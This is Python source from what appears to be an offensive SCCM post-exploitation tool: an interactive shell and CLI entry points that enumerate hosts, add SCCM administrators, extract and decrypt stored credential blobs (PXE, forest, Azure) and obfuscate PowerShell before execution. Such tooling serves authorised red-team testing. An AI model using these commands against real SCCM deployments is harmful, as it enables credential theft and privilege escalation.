    @cmd2.with_category(SA) 
    def do_administrators(self, arg):
        """Query local administrators on target"""
        logger.info("Tasked SCCM to run Administrators.")
        self.pivot.administrators(device=self.device)
    
    @cmd2.with_category(SA)
    def do_ipconfig(self, arg):
        """Run ipconfig on target"""
        logger.info("Tasked SCCM to run IPCONFIG.")
        self.pivot.ipconfig(device=self.device)

    @cmd2.with_category(SA)
    def do_shares(self, arg):
        """List file shares hosted on target."""
        logger.info("Tasked SCCM to list file shares.")
        self.pivot.file_share(device=self.device)

    @cmd2.with_category(SA)
    def do_services(self, arg):
        """List running services on target."""
        logger.info("Tasked SCCM to list services.")
        self.pivot.services(device=self.device)
    
    @cmd2.with_category(SA)
    def do_ps(self, arg):
        """List running processes on target."""
        logger.info("Tasked SCCM to list processes.")
        self.pivot.process(device=self.device)

    @cmd2.with_category(SA)
    def do_console_users(self, arg):
        """Show total time any users has logged on to the target."""
        logger.info("Tasked SCCM to show all users that have signed in.")
        self.pivot.system_console_user(device=self.device)

    @cmd2.with_category(SA)
    def do_ls(self, arg):
        """List files in current working directory."""
        logger.info(f"Tasked SCCM to list files in {self.cwd}.")
        path = self.cwd + "*"
        self.pivot.file(arg=path, device=self.device)

    @cmd2.with_category(SA)
    def do_list_disk(self, arg):
        """Show drives mounted to the target system."""
        logger.info(f"Tasked SCCM to show mounted drives on {self.device}.")
        self.pivot.logical_disk(device=self.device)

    @cmd2.with_category(SA)
    def do_software(self, arg):
        """Show installed software on the target system."""
        logger.info(f"Tasked SCCM to list software installed {self.device}.")
        self.pivot.installed_software(device=self.device)   

    @cmd2.with_category(SA)
    def do_sessions(self, arg):
        """Show users with an active session on the target system."""
        logger.info(f"Tasked SCCM to show users currently signed in to {self.device}.")
        self.pivot.user(device=self.device)   

    @cmd2.with_category(SA)
    def do_osinfo(self, arg):
        """Show OS info of target system."""
        logger.info(f"Tasked SCCM to show system info of {self.device}.")
        self.pivot.osinfo(device=self.device)

    @cmd2.with_category(SA)
    def do_environment(self, arg):
        """Show configured environment variables on target."""
        logger.info(f"Tasked SCCM to show Environment variables of {self.device}.")
        self.pivot.environment(device=self.device)

    @cmd2.with_category(SA)
    def do_disk(self, arg):
        """Show disk information on the target."""
        logger.info(f"Tasked SCCM to show disk information of {self.device}.")
        self.pivot.disk(device=self.device)


    @cmd2.with_argparser(PARSERS.do_sessionhunter_parser)
    @cmd2.with_category(SA)
    def do_sessionhunter(self, args):
        user = args.user
        """Search for all systems a target user has a current session on"""
        self.pivot.sessionhunter(self.device, user)


# ############
# Add Admin Section
# ############

    @cmd2.with_argparser(PARSERS.do_add_admin_parser)
    @cmd2.with_category(PE)
    def do_add_admin(self, args):
        """Add SCCM Admin                               add_admin (user) (sid)"""

        targetuser = args.user
        targetsid = args.sid
        logger.info(f"Tasked SCCM to add {targetuser} as an administrative user.")
        self.admin.add(targetuser=targetuser, targetsid=targetsid)
    
    @cmd2.with_argparser(PARSERS.do_delete_admin_parser)
    @cmd2.with_category(PE)
    def do_delete_admin(self, args):
        """Remove SCCM Admin                            delete_admin (user)"""
        targetuser = args.user
        logger.info(f"Tasked SCCM to remove {targetuser} as an administrative user.")
        self.admin.delete(targetuser=targetuser)

    @cmd2.with_category(PE)
    def do_show_admins(self, arg):
        """List admin users                             show_admins"""
        logger.info(f"Tasked SCCM to list current SMS Admins.")
        self.admin.show_admins()

    @cmd2.with_category(PE)
    def do_show_rbac(self, arg):
        """List users and their roles                   show_rbac"""
        logger.info(f"Tasked SCCM to list all RBAC")
        self.admin.show_rbac()


    

# ############
# Other PostEx that doens't fit anywhere else
# ############

    @cmd2.with_category(PE)
    def do_show_consoleconnections(self, arg):
        """List console sessions and source             show_consoleconnections"""
        logger.info(f"Tasked SCCM to list all SCCM console connections")
        self.admin.show_consoleconnections()
        
    @cmd2.with_category(PE)
    def do_get_sccmversion(self, arg):
        """Show current version of SCCM                 get_sccmversion"""
        logger.info(f"Tasked SCCM to show console version")
        self.admin.get_sccmversion()
    @cmd2.with_category(PE)
    def do_get_consoleinstaller(self, arg):
        """Show current version of SCCM                 get_consoleinstaller"""
        logger.info(f"Downloading adminconsole installation files")
        self.admin.get_consoleinstaller()


# ############
# Creds Extraction
# ############

    @cmd2.with_category(CE)
    def do_get_creds(self, arg):
        """Extract encrypted cred blobs                     get_creds"""
        logger.info("Tasked SCCM to extract all encrypted credential blobs")
        self.admin.get_creds()

    @cmd2.with_category(CE)
    def do_get_pxepassword(self, arg):
        """Extract pxeboot encrypted cred blobs             get_pxepassword"""
        logger.info("Tasked SCCM to extract PXE boot password credential blobs")
        self.admin.get_pxepass()
    
    @cmd2.with_category(CE)
    def do_get_forestkey(self, arg):
        """Extract forest discovery session key blobs       get_forestkey"""
        logger.info("Tasked SCCM to extract forest session key blobs")
        self.admin.get_forestkey()

    @cmd2.with_category(CE)
    def do_get_azurecreds(self, arg):
        """Extract Azure application cred blobs             get_azurecreds"""
        logger.info("Tasked SCCM to extract Azure app credential blobs")
        self.admin.get_azurecreds()

    @cmd2.with_category(CE)
    def do_get_azuretenant(self, arg):
        """Get Azure Tenant Info                            get_azuretenant"""
        logger.info("Tasked SCCM to extract tenant info.")
        self.admin.get_azuretenant()
    
    
    @cmd2.with_category(CE)
    def do_decrypt(self, arg):
        """Decrypt provided encrypted blob                  decrypt [blob]"""
        logger.info("Tasked SCCM to decrypt credential blob")
        option = arg.split(' ')
        blob = option[0]
        if self.device == "":
            logger.info("Device ID not found. Decryptiong requires site server device ID")
        else:
            self.script.decrypt(blob=blob, device=self.device)

    @cmd2.with_category(CE)
    def do_speak_to_the_manager(self, arg):
        """Dump policy credentials                          speak_to_the_manager"""
        logger.info("Tasked SCCM to find a manager.")
        self.karen.run()


    @cmd2.with_category(CE)
    def do_decryptEx(self, arg):
        """Decrypt provided blob with session key           decryptEx [session key] [blob]"""
        logger.info("Tasked SCCM to decrypt credential with session key blob")
        option = arg.split(' ')
        skey = option[0]
        blob = option[1]
        if self.device == "":
            logger.info("Device ID not found. Decryptiong requires site server device ID")
        else:
            self.script.decryptEx(session_key=skey,encrypted_blob=blob,device=self.device)




class CONSOLE:
    def __init__(self, username=None, password=None, kerberos=False, domain=None, kdc=None, ip=None, debug=False, logs_dir=None, auser=None, apassword=None, accache=None, ps_transform=None):
        self.username = username
        self.password = password
        self.url = ip
        self.kerberos = kerberos
        self.domain = domain
        self.kdc_host = kdc
        self.debug = debug
        self.logs_dir = logs_dir
        self.approve_user = auser
        self.approve_password = apassword
        self.ps_transform = ps_transform
        self.approve_ccache = os.path.abspath(accache) if accache else None
        

    def run(self):
        endpoint = f"https://{self.url}/AdminService/wmi/"
        try:
            if self.kerberos:
                
                token = ldap3_kerberos_login(
                    connection=None,
                    target=self.url,  # Extract hostname
                    user=self.username,
                    password=self.password,
                    domain=self.domain,
                    kdcHost=self.kdc_host,
                    admin_service=True
                )
                headers = {'Content-Type': 'application/json; odata=verbose', 
                        'User-Agent': 'Device action simulation',
                        'Authorization': token}
                
                r = requests.request("GET", 
                                    endpoint,
                                    verify=False,
                                    headers=headers)  
            else:
                headers = {'Content-Type': 'application/json; odata=verbose', 
                        'User-Agent': 'Device action simulation'}
                r = requests.request("GET",
                            endpoint,
                            auth=HttpNtlmAuth(self.username, self.password),
                            verify=False, headers=headers)


            if self.approve_user or self.approve_ccache:
                approve_headers = {'Content-Type': 'application/json; odata=verbose',
                                   'User-Agent': 'Device action simulation'}
                if self.kerberos and self.approve_ccache:
                    original_ccache = os.environ.get('KRB5CCNAME')
                    os.environ['KRB5CCNAME'] = self.approve_ccache
                    try:
                        approve_token = ldap3_kerberos_login(
                            connection=None,
                            target=self.url,
                            user='',
                            password='',
                            domain=self.domain,
                            kdcHost=self.kdc_host,
                            admin_service=True
                        )
                    finally:
                        if original_ccache:
                            os.environ['KRB5CCNAME'] = original_ccache
                        else:
                            del os.environ['KRB5CCNAME']
                    approve_headers['Authorization'] = approve_token
                    approve_r = requests.request("GET",
                                    endpoint,
                                    verify=False, headers=approve_headers)
                else:
                    approve_r = requests.request("GET",
                                    endpoint,
                                    auth=HttpNtlmAuth(self.approve_user, self.approve_password),
                                    verify=False, headers=approve_headers)
                if approve_r.status_code == 401:
                    logger.info("Got error code 401: Access Denied. Check your approver credentials.")
                    logger.info("Script execution will fail if approval is required.")

            
            if r.status_code == 200:
                self.cli()
            elif r.status_code == 401:
                logger.info("Got error code 401: Access Denied. Check your credentials.")
                logger.info(r.content)
                logger.info(r)
            else:
                logger.info(r.text)
        except Exception as e:
            logger.info("An unknown error occurred, use -debug to print the response")
            raise e
            logger.info(e)

    def cli(self):
        #username, password, kerberos, domain, kdc, target, logs_dir, auser, apassword
        cli = SHELL(self.username, self.password, self.kerberos, self.domain, self.kdc_host, self.url, self.logs_dir, self.approve_user, self.approve_password, self.approve_ccache, ps_transform=self.ps_transform)
        cli.cmdloop()

if __name__ == '__main__':
    import sys
    c = CMD()
    sys.exit(c.cmdloop())                                                                                                                                                                                                                            


    
                                                                                                                                                                                                                           



import typer
from lib.attacks.smb import SMB
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'smb'
HELP = 'Profile and Enumerate SMB shares of discovered SCCM servers.'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(
    username        : str   = typer.Option(None, "-u",  help="Username"),
    password        : str   = typer.Option(None, '-p',  help="Password"),
    domain          : str   = typer.Option(..., '-d',  help="Target domain"),
    dc_ip           : str   = typer.Option(..., '-dc-ip',  help = "IP address or FQDN of domain controller"),
    ldaps           : bool  = typer.Option(False, '-ldaps', help='Use LDAPS instead of LDAP'),
    kerberos        : bool  = typer.Option(False, "-k", help='Use Kerberos authentication'),
    no_pass         : bool  = typer.Option(False, "-no-pass", help="don't ask for password (useful for -k)"),
    hashes          : str   = typer.Option(None, "-hashes",metavar="LMHASH:NTHASH", help="LM and NT hashes, format is LMHASH:NTHASH"),
    aes             : str   = typer.Option(None, '-aes', metavar="HEX KEY", help='AES key to use for Kerberos Authentication (128 or 256 bits)'), 
    debug           : bool  = typer.Option(False, '-debug',help='Enable Verbose Logging'),
    save            : bool  =  typer.Option(False, '-save', help='Save PXEBoot variables files if found.')):

    logs_dir = init_logger(debug)
    smbhunter = SMB(username=username, password=password, domain=domain, dc_ip=dc_ip,ldaps=ldaps,
                            kerberos=kerberos, no_pass=no_pass, hashes=hashes, aes=aes, debug=debug,
                             save=save, logs_dir=logs_dir)
    smbhunter.run()






import typer
from lib.attacks.admin import CONSOLE
from lib.logger import init_logger

app = typer.Typer()
COMMAND_NAME = 'admin'
HELP = 'Run administrative commands through the AdminService API.'

@app.callback(no_args_is_help=True, invoke_without_command=True)

def main(
    username        : str   = typer.Option(None, "-u",  help="Username"),
    password        : str   = typer.Option(None, '-p',  help="Password or NTLM hash. (LM:NT)"),
    ip              : str   = typer.Option(..., '-ip',  help = "IP address or hostname of site server"),
    kerberos        : bool  = typer.Option(False, '-k', help="Use kerberos authentication"),
    domain          : str   = typer.Option(None, '-d', help="Target domain name"),
    kdc             : str   = typer.Option(None, '-dc', help="Target domain controller for Kerberos auth"),
    debug           : bool  = typer.Option(False, '-debug',help='Enable Verbose Logging'),
    auser           : str   = typer.Option(None, '-au', help="Optional script approval username"),
    apassword       : str   = typer.Option(None, '-ap', help="Optional script approval password"),
    ps_transform    : str   = typer.Option(None, '-pstransform', help="External command to obfuscate PowerShell scripts before execution. Use {input} and {output} placeholders for file-based tools (e.g. 'obfuscator -i {input} -o {output}'). Without placeholders, uses stdin/stdout piping."),
    accache         : str   = typer.Option(None, '-ac', help="Optional ccache file for script approval (Kerberos)")
):



    logs_dir = init_logger(debug)
    cmpivot = CONSOLE(username=username, password=password, kerberos=kerberos, domain=domain, kdc=kdc, ip=ip, debug=debug, logs_dir=logs_dir, auser=auser, apassword=apassword, accache=accache, ps_transform=ps_transform)
    cmpivot.run()
